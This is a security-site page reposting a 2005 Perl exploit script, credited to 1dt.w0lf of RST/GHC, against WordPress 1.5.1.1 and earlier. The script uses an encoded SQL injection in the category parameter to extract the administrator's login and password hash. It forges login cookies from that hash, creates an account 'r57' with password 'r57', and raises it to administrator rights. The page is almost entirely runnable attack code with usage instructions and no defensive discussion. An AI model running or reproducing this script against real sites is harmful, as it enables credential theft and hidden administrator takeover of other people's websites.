首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
WordPress <= 1.5.1.1 cat_id Remote SQL Injection Exploit
来源:http://rst.void.ru 作者:1dt.w0lf 发布时间:2005-06-22  

WordPress <= 1.5.1.1 "cat_id" Remote SQL Injection Exploit

#!/usr/bin/perl

## WordPress <= 1.5.1.1 sql injection "add new admin" exploit
## by RST/GHC , http://rst.void.ru , http://ghc.ru
## coded by 1dt.w0lf

use LWP::UserAgent;
use Getopt::Std;
use HTTP::Cookies;
use Digest::MD5 qw(md5_hex);
getopts('h:p:');

$path = $opt_h;
$pref = $opt_p || 'wp_';

if(!$path) { usage(); }

$xpl = LWP::UserAgent->new() or die;
&header();
print " +---[x] STEP 1 - TRY GET ADMIN INFO\n";
$reg = $path;
$reg .= '?%63%61%74=%36%36%36%20%75%6E%69%6F%6E%20%73%65%6
C%65%63%74%20%36%36%36%2C%63%6F%6E'.
'%63%61%74%28%63%68%61%72%28%35%38%2C%35%38%2C%35%38%29
%2C%75%73%65%72%5F%6C%6F%67%69'.
'%6E%2C%63%68%61%72%28%35%38%2C%35%38%2C%35%38%29%2C%75
%73%65%72%5F%70%61%73%73%2C%63'.
'%68%61%72%28%35%38%2C%35%38%2C%35%38%29%29%2C%6E%75%6C
%6C%2C%6E%75%6C%6C%2C%6E%75%6C'.
'%6C%20%66%72%6F%6D%20'.$pref.'%75%73%65%72%73%20%57%48%45%
52%45%20%49%44=1'; ### 1 - admin ID
$res = $xpl->get($reg);
die "ERROR : ", $res->status_line unless $res->is_success;
if($res->content =~ m/(?::::)(.*)(?::::)([a-f0-9]{32})(?::::)(<\/title>)/)
{
$login = $1; $hash = $2;
print "\n>> LOGIN : $login\n>> HASH : $hash\n\n";
}
else { print "ERROR : Forum not vulnerable or bad prefix."; exit(); }

$cookie_jar = HTTP::Cookies->new();
($cpath = $path) =~ s!/$!!;
$hash = md5_hex($hash);
($host = $cpath) =~ s!http://([^/]*).*!$1!;
$cpath = md5_hex($cpath);

$xpl->cookie_jar( $cookie_jar );

$cookie_jar->set_cookie( "0","wordpresspass_$cpath","$hash","/",$host,,,,,);
$cookie_jar->set_cookie( "1","wordpressuser_$cpath","$login","/",$host,,,,,);
print " +---[x] STEP 2 - CREATE NEW USER\n";
$reg = $path;
$reg .= 'wp-admin/users.php';
$res = $xpl->post("$reg",
{
"action" => "adduser",
"user_login" => "r57",
"firstname" => "RST",
"lastname" => "GHC",
"email" => "billy\@microsoft.com",
"uri" => "http://rst.void.ru",
"pass1" => "r57",
"pass2" => "r57",
"adduser" => "Submit",
},
Referer => $reg
);
print " +---[x] STEP 3 - GET ID OF NEW USER\n";
$reg = $path;
$reg .= 'wp-admin/users.php';
$res = $xpl->get("$reg",Referer => $reg);
@res = split(/\n/,$res->content);
$id = 0;
for(@res)
{
if(/(?:\<td align=\'center\'\>)([0-9]*)(?:\<\/td\>)/) { $id = $1; }
if(/\<td\>\<strong\>r57\<\/strong\>\<\/td\>/) { last; }
}
die "ERROR : ", $res->status_line unless $res->is_success;
if($id != 0) { print "\n>> ID : $id\n\n"; }
else { print "[-] ERROR : CAN'T GET NEW USER ID\n"; exit(); }
print " +---[x] STEP 4 - LEVEL UP FOR NEW USER\n\n";
$reg = $path;
$reg .= 'wp-admin/users.php?action=promote&id='.$id.'&prom=up';
for($i=0;$i<10;$i++)
{
print ">> LEVEL UP # $i\n";
$res = $xpl->get("$reg",Referer => $reg);
die "ERROR : ", $res->status_line unless $res->is_success;
}
print "\nTHATS ALL. NOW YOU CAN LOGIN WITH USERNAME 'r57' AND PASSWORD 'r57'\n";

sub usage()
{
&header();
print "USAGE : r57wp.pl [OPTIONS]\n";
print "\noptions:\n\n";
print "-h [path]\n";
print " Path to wordpress installed\n";
print "-p [prefix] (optional)\n";
print " Database tables prefix (default 'wp_')\n\n";
print "e.g.: r57wp.pl -h http://blah.com/wordpress/\n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print "(c)oded by 1dt.w0lf\n";
print "RST/GHC\n";
print "http://ghc.ru\n";
print "http://rst.void.ru\n";
exit();
}
sub header()
{
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
print " WordPress 1.5.1.1 exploit \n";
print "~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n";
}




 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Mambo user_rating Parameter Re
·Claroline E-Learning Applicati
·Forum Russian Board SQL Inject
·Ultimate PHP Board Password Ha
·Microsoft Windows Plug and Pla
·eXtropia WebStore Remote Comma
·VERITAS NetBackup bpjava-msvc
·PeerCast <= 0.1211 HTTP Req
·VERITAS NetBackup bpjava-msvc
·phpBB Multiple User Registerat
·VERITAS NetBackup bpjava-msvc
·Simple Machine Forum SQL Injec
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved